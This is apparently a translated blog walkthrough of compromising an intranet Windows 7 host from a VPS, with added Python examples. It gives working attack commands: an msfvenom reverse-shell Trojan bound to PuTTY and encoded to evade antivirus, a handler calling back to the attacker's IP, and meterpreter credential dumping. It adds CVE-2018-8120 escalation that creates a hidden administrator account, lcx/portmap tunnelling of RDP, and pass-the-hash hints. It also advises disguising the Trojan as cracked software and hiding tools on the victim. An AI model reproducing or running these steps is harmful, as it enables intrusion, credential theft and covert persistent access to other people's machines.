Using a VPS to penetrate an intranet Windows 7 host
Environment and tools:
CentOS 7 VPS: 22.214.171.124 (a public IP, rented temporarily for this experiment)
Metasploit penetration framework
CVE-2018-8120 local privilege escalation executable
Windows Exploit Suggester (wes.py)
PuTTY executable (used as the template the Trojan is bound to)
lcx (port forwarding tool for Windows)
portmap (port forwarding tool for Linux)
SAMInside (cracks system user password hashes)
Installing Metasploit on CentOS 7
yum install -y curl wget    # CentOS uses yum; apt-get (as in the original notes) only exists on Debian/Ubuntu
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall        # grant execute permission to msfinstall
./msfinstall                # after a successful install, run the steps below so the freshly downloaded msf is connected to its database
adduser msf                 # add an msf user; you will be prompted for the new account's password
su msf                      # switch to the msf user (run msf as an unprivileged user, not root)
msfconsole                  # the first start offers to set up the PostgreSQL database; accept it
Generate the Trojan and bind it to a program (shellter can also be used to bind the Trojan to a program; which tool you use is personal habit):
msfvenom -p windows/shell_reverse_tcp LHOST=126.96.36.199 LPORT=8001 -e x86/shikata_ga_nai -x putty.exe -k -i 5 -f exe -o backdoor.exe

-p windows/shell_reverse_tcp   use the shell_reverse_tcp payload (a plain cmd shell; a meterpreter session needs windows/meterpreter/reverse_tcp instead)
LHOST=126.96.36.199            the attacker's (VPS) IP address that the Trojan will connect back to
LPORT=8001                     the listening port on the attacker that the Trojan actively connects to
-e x86/shikata_ga_nai          re-encode the payload with the shikata_ga_nai encoder so that its bytes no longer match AV signatures
-x putty.exe                   bundle the payload into the specified executable template, here putty.exe
-k                             keep the template's original behaviour: the payload is injected as a new thread, so PuTTY still starts normally
-i 5                           run the chosen encoder five times. (In theory several passes help evade AV, but not necessarily: AV evasion is not free, vendors target every new evasion technique as soon as it appears, and the decoder stub the encoder prepends is itself what gets signatured.)
-f exe                         output format exe
-o backdoor.exe                output path of the processed file
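The following added Python example (my code, not msfvenom's and not from the original post) models what the -e and -i options do: a simplified 32-bit additive-feedback XOR encoder in the spirit of x86/shikata_ga_nai, applied five times with a fresh random key per pass, plus a crude byte-signature check. The payload bytes are a constructed stand-in rather than shellcode, and every function name here is mine. It shows why the encoded bytes change on every run while the decoded result is identical, which is exactly the property that the constant decoder stub does not share.

```python
import random
import struct

# Constructed stand-in for a raw payload. This is NOT shellcode, just distinctive bytes so the
# effect of encoding is visible; a real msfvenom run would put the reverse_tcp stager here.
SAMPLE_PAYLOAD = b"stand-in payload: connect back to 10.0.0.1:8001 and spawn cmd.exe\x90\x90\x90\x90"

def encode_once(data, key):
    """One pass of 32-bit additive-feedback XOR (simplified model of shikata_ga_nai).
    Each dword is XORed with the running key, and the key is then advanced by the
    *encoded* dword, so a change in one dword alters every dword after it."""
    assert len(data) % 4 == 0
    out = bytearray()
    k = key
    for i in range(0, len(data), 4):
        (word,) = struct.unpack("<I", data[i:i + 4])
        enc = word ^ k
        out += struct.pack("<I", enc)
        k = (k + enc) & 0xFFFFFFFF
    return bytes(out)

def decode_once(blob, key):
    """Inverse of encode_once: the decoder stub only needs the initial key."""
    out = bytearray()
    k = key
    for i in range(0, len(blob), 4):
        (enc,) = struct.unpack("<I", blob[i:i + 4])
        out += struct.pack("<I", enc ^ k)
        k = (k + enc) & 0xFFFFFFFF
    return bytes(out)

def encode(payload, iterations=5, rng=None):
    """Encode `iterations` times with a random key per pass (the -i 5 of msfvenom).
    Returns (blob, keys, original_length); a real stub embeds keys and length in code."""
    rng = rng or random.Random()
    data = payload + b"\x00" * (-len(payload) % 4)   # pad to a dword boundary
    keys = []
    for _ in range(iterations):
        key = rng.getrandbits(32)
        data = encode_once(data, key)
        keys.append(key)
    return data, keys, len(payload)

def decode(blob, keys, length):
    """Undo the passes in reverse order and strip the padding."""
    for key in reversed(keys):
        blob = decode_once(blob, key)
    return blob[:length]

def signature_hits(payload, blob, n=8):
    """Count n-byte windows of the plain payload that still appear verbatim in the blob:
    a crude model of a byte-pattern AV signature surviving the encoding."""
    windows = {payload[i:i + n] for i in range(len(payload) - n + 1)}
    return sum(1 for w in windows if w in blob)

def demo(seed=1):
    """Encode the sample payload twice with different seeds and report what changed."""
    blob_a, keys_a, n = encode(SAMPLE_PAYLOAD, 5, random.Random(seed))
    blob_b, keys_b, _ = encode(SAMPLE_PAYLOAD, 5, random.Random(seed + 1))
    return {
        "roundtrip_ok": decode(blob_a, keys_a, n) == SAMPLE_PAYLOAD
                        and decode(blob_b, keys_b, n) == SAMPLE_PAYLOAD,
        "encodings_differ": blob_a != blob_b,   # same payload, different bytes on disk
        "plain_hits": signature_hits(SAMPLE_PAYLOAD, SAMPLE_PAYLOAD),
        "encoded_hits": signature_hits(SAMPLE_PAYLOAD, blob_a),
    }
```

The keys and the loop that applies them must ship inside the binary for the payload to run, and that decoder code is emitted in near-identical form on every run; more -i iterations add layers of encoding but no variety to the stub, which is why the note above says several passes do not necessarily help.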
Use Kali's upx to pack the Trojan in an attempt to bypass AV:
upx -5 backdoor.exe
Packed successfully; submit it for a scan.
(UPX is a well-known packer that AV engines unpack trivially, so packing on its own rarely helps and often raises the detection rate.)
Side note: nothing more on this here; AV evasion will be studied separately.
Another line of thinking is to bind the Trojan to cracked software: download pages for cracked software on the Internet generally advise users to turn off their antivirus, and this social engineering angle can be used to get the Trojan downloaded and executed. (The Trojan needs to be renamed to something normal, e.g. "putty portable.exe"; names like backdoor or shell are far too obvious, and anyone can see at a glance that there is something wrong with that executable.)
[root@vultr ~]# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 184.108.40.206
LHOST => 184.108.40.206
msf5 exploit(multi/handler) > set LPORT 8001
LPORT => 8001
msf5 exploit(multi/handler) > run
(LHOST and LPORT must be the same values given to msfvenom, and the handler's payload must match the generated one: windows/shell_reverse_tcp only yields a plain command shell, so the meterpreter commands below require the Trojan and the handler to use windows/meterpreter/reverse_tcp.)
The target runs the Trojan file and the VPS receives a meterpreter session:
meterpreter > getuid          # current user
meterpreter > sysinfo         # system information
meterpreter > ps              # running processes
meterpreter > netstat -ano    # open ports and connections
meterpreter > shell           # interactive command shell
meterpreter > run hashdump    # dump user password hashes (needs SYSTEM privileges)
meterpreter > load mimikatz   # load the mimikatz extension (deprecated; `load kiwi` is the current equivalent)
meterpreter > kerberos        # dump clear-text passwords from lsass
The last two fail: the session's privileges are insufficient to obtain password hashes or clear-text passwords, so privilege escalation is needed first.
meterpreter > shell   # interactive command shell
C:\Users\wwb\Desktop>systeminfo > systeminfo.txt   # write the system configuration (OS build, installed hotfixes) to systeminfo.txt in the current directory
meterpreter > download c:\\Users\\wwb\\Desktop\\systeminfo.txt   # pull systeminfo.txt back to the VPS
python wes.py --update                         # download the vulnerability/patch database built from Microsoft's official data
python wes.py -e systeminfo.txt > result.txt   # compare the installed patches against it; -e lists only vulnerabilities with known exploits; results go to result.txt in the current directory
Check result.txt and select a vulnerability to exploit.
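To make the comparison WES performs concrete, here is an added Python example (my code, not WES-NG's and not from the original post) that parses a constructed systeminfo.txt and checks it against a tiny hand-built patch table. The table entry for CVE-2018-8120 (Windows 7 SP1 build 6.1.7601, closed by KB4103718 or KB4103712, later superseded by the KB4284826 rollup) is written from memory and is an assumption to verify against the Microsoft Security Update Guide; WES-NG ships the full table plus supersedence data, and the supersedence step is what separates it from naive "missing KB" scripts.

```python
import re

# Constructed sample of `systeminfo` output from a Windows 7 SP1 x64 host (most fields trimmed).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN7-TARGET
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB3020369
                           [03]: KB4019990
"""

# Hand-built stand-in for the WES/MSRC database. The CVE-2018-8120 entry (build 6.1.7601,
# closed by the May 2018 rollup KB4103718 or the security-only KB4103712) is an ASSUMPTION
# from memory: check it against the Microsoft Security Update Guide before relying on it.
PATCH_DB = {
    "CVE-2018-8120": {"build": "6.1.7601", "fixed_by": {"KB4103718", "KB4103712"}},
}

# Supersedence: a later monthly rollup contains the earlier fixes, so a host with only the
# newer rollup installed is patched even though the original KB never shows in systeminfo.
# KB4284826 (June 2018 rollup) superseding KB4103718 is likewise an assumed example entry.
SUPERSEDES = {
    "KB4284826": {"KB4103718"},
}

def parse_systeminfo(text):
    """Extract the OS build (major.minor.build) and the set of installed KBs."""
    m = re.search(r"^OS Version:\s+(\d+\.\d+\.\d+)", text, re.MULTILINE)
    build = m.group(1) if m else None
    hotfixes = set(re.findall(r"\bKB\d{6,7}\b", text))
    return {"build": build, "hotfixes": hotfixes}

def effective_patches(installed, supersedes):
    """Close the installed set under supersedence (transitively), so that having a newer
    rollup counts as having every KB it replaced."""
    effective = set(installed)
    pending = list(installed)
    while pending:
        kb = pending.pop()
        for older in supersedes.get(kb, ()):
            if older not in effective:
                effective.add(older)
                pending.append(older)
    return effective

def suggest(info, db=PATCH_DB, supersedes=SUPERSEDES):
    """CVEs whose affected build matches this host and whose fixing KBs are all missing.
    Without the supersedence step this check over-reports, which is the usual source of
    false positives in naive 'missing KB' scripts."""
    have = effective_patches(info["hotfixes"], supersedes)
    return sorted(cve for cve, entry in db.items()
                  if entry["build"] == info["build"] and not (entry["fixed_by"] & have))
```

Run `suggest(parse_systeminfo(open("systeminfo.txt").read()))` on real output to see the same logic; the sample host above is flagged for CVE-2018-8120, and adding either the original KB or the superseding rollup to its hotfix list clears the finding.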
Found in the toolkit: a compiled CVE-2018-8120 local privilege escalation exploit.
meterpreter > upload /root/CVE-2018-8120.exe c:\\Users\\wwb\\Desktop   # upload to the target host's desktop directory
meterpreter > shell
C:\Users\wwb\Desktop>cve-2018-8120.exe "whoami"   # test: the exploit runs the given command with elevated (SYSTEM) privileges
C:\Users\wwb\Desktop>cve-2018-8120.exe "net user hacker$ hacker /add"                  # add the user hacker$ with password hacker
C:\Users\wwb\Desktop>cve-2018-8120.exe "net localgroup administrators hacker$ /add"   # add hacker$ to the local Administrators group
(A trailing $ only keeps the account out of the `net user` listing; it is still visible in Computer Management / lusrmgr.msc and in the SAM, so this is not a truly hidden account.)
Upload lcx.exe to the target:
meterpreter > upload /root/lcx.exe c:\\Users\\wwb\\Desktop   # upload to the target host's desktop directory
meterpreter > shell
C:\Users\wwb\Desktop>netstat -ano   # check open ports: 3389 must be listening
Remote Desktop service is enabled on the target:
On the VPS, open a new terminal and start the listener/forwarder first (the slave has nothing to connect to otherwise):
[root@vultr ~]# ./portmap -m 2 -p1 55 -p2 56   # listen on port 55 for the target's slave connection and forward it to whoever connects on port 56
Then on the target:
C:\Users\wwb\Desktop>lcx -slave 220.127.116.11 55 127.0.0.1 3389   # connect out to VPS port 55 and relay it to local port 3389, i.e. map the target's 3389 to public port 55
(The connection is outbound from the target, which is why the target's firewall does not block it; ports 55 and 56 do have to be open inbound on the VPS.)
Because the VPS has no desktop environment installed, another Windows 10 host is used to connect to the target over Remote Desktop, by connecting to port 56 on the VPS.
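As an added example (my code, not lcx or portmap, and not from the original post), here is the reverse forward above modelled in Python so the data path can be traced end to end: portmap_listen_listen plays the VPS side (`portmap -m 2 -p1 ... -p2 ...`), lcx_slave plays the target side (`lcx -slave ...`), and a constructed echo listener stands in for RDP on 3389. Ports are chosen by the OS and everything runs on localhost; the real chain runs across the Internet with the target dialling out to the VPS. The function names and the simplification that the slave opens both connections immediately are mine.

```python
import socket
import threading

def _listen(host="127.0.0.1", port=0):
    """Bind a listening TCP socket; port 0 lets the OS pick one (no fixed ports needed here)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(5)
    return s

def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then close dst's write side so the EOF propagates."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def relay(a, b):
    """Full-duplex relay between two connected sockets, one thread per direction."""
    for src, dst in ((a, b), (b, a)):
        threading.Thread(target=_pump, args=(src, dst), daemon=True).start()

def portmap_listen_listen(port1=0, port2=0, host="127.0.0.1"):
    """Model of `portmap -m 2 -p1 PORT1 -p2 PORT2` on the VPS: accept the target's slave
    connection on PORT1, then bridge the next client arriving on PORT2 to it.
    Returns the two bound ports (useful when 0 was requested)."""
    s1, s2 = _listen(host, port1), _listen(host, port2)

    def serve():
        slave, _ = s1.accept()    # lcx -slave calling home from the target
        client, _ = s2.accept()   # the operator's RDP client
        relay(slave, client)

    threading.Thread(target=serve, daemon=True).start()
    return s1.getsockname()[1], s2.getsockname()[1]

def lcx_slave(vps_host, vps_port, local_host, local_port):
    """Model of `lcx -slave VPS_HOST VPS_PORT LOCAL_HOST LOCAL_PORT` on the target: dial out
    to the VPS (outbound, so the target's firewall is not in the way) and to the local
    service, then relay between the two."""
    to_vps = socket.create_connection((vps_host, vps_port))
    to_local = socket.create_connection((local_host, local_port))
    relay(to_vps, to_local)

def fake_rdp_service(host="127.0.0.1"):
    """Constructed stand-in for the target's 3389 listener: echoes whatever it receives."""
    s = _listen(host, 0)

    def serve():
        conn, _ = s.accept()
        _pump(conn, conn)

    threading.Thread(target=serve, daemon=True).start()
    return s.getsockname()[1]

def demo(message=b"RDP-hello"):
    """Run the whole chain on localhost and return what the client gets back."""
    svc_port = fake_rdp_service()                      # "3389" on the target
    p1, p2 = portmap_listen_listen()                   # "55" and "56" on the VPS
    lcx_slave("127.0.0.1", p1, "127.0.0.1", svc_port)  # target dials out to the VPS
    client = socket.create_connection(("127.0.0.1", p2))  # operator connects to VPS:56
    client.settimeout(5)
    client.sendall(message)
    got = b""
    while len(got) < len(message):
        chunk = client.recv(4096)
        if not chunk:
            break
        got += chunk
    client.close()
    return got
```

Bytes the operator sends to the VPS's second port travel VPS -> slave -> local service and back, which is why deleting lcx later breaks the RDP path: the slave process is the only link between 3389 and the VPS.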
Open Remote Desktop Connection, map a local drive (Remote Desktop Connection - Local Resources - More), log in remotely as the hacker$ account, and copy SAMInside across through the mapped drive (instead of using meterpreter's upload). (In a real engagement, however, never let your real host exchange traffic directly with the target; several VPSes are chained in between as hops to hide the operator.)
Run SAMInside as administrator.
The password hash is too complex to crack locally and needs outside help.
Crack the system password hash online. (Note that the NTLM hash alone is already usable: on Windows 7 it can be passed directly, for example with psexec-style tools, without ever cracking it.)
Administrator account password obtained: wwb/asd123
Log in remotely with the original administrator account.
When trying to delete lcx it turned out that it cannot be deleted while running, and we need this executable to keep the target's port 3389 mapped to the VPS. For an executable that stays in use like this, find a folder to hide it in.
To be continued; updates and improvements to follow.